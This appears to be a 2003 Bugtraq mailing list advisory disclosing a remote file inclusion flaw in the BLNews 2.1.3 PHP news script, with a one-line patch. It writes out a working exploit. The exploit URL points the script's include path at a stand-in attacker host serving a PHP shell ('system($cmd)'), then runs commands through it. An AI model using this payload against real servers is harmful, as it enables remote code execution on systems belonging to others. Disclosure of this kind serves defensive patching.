Bugtraq mailing list archives
PHP source code injection in BLNews
From: Over_G <overg () mail ru>
Date: Thu, 22 May 2003 14:42:13 +0400
Product: BLNews Version: 2.1.3 OffSite: http://www.blnews.de/ Problem: PHP source code injection -------------------------------------------- Vulnerability: ------------admin/objects.inc.php4------------ if ($itheme!="blubb") { include("$Server[path]/admin/tools.inc.php4"); } include("$Server[path]/admin/$Server[language_file]"); ----------------------------------------------------- The developers forgot write include("server.inc.php4") :) Exploit: admin/objects.inc.php4?Server[path]=http://ATACKER&Server[language_file]=cmd.php4 with http://ATACKER/admin/tools.inc.php4 http://ATACKER/admin/cmd.php4 with <? system($cmd) ?> Use: objects.inc.php4?Server[path]=http://ATACKER&cmd=id;uname -a;pwd; Patch. write before line if ($itheme!="blubb") include("server.inc.php4"); Contacts: www.overg.com www.dwcgr0up.com irc.irochka.net #DWC overg () mail ru regards, Over G[DWC Gr0up]
Current thread:
- PHP source code injection in BLNews Over_G (May 24)
- <Possible follow-ups>
- PHP source code injection in BLNews Over_G (May 24)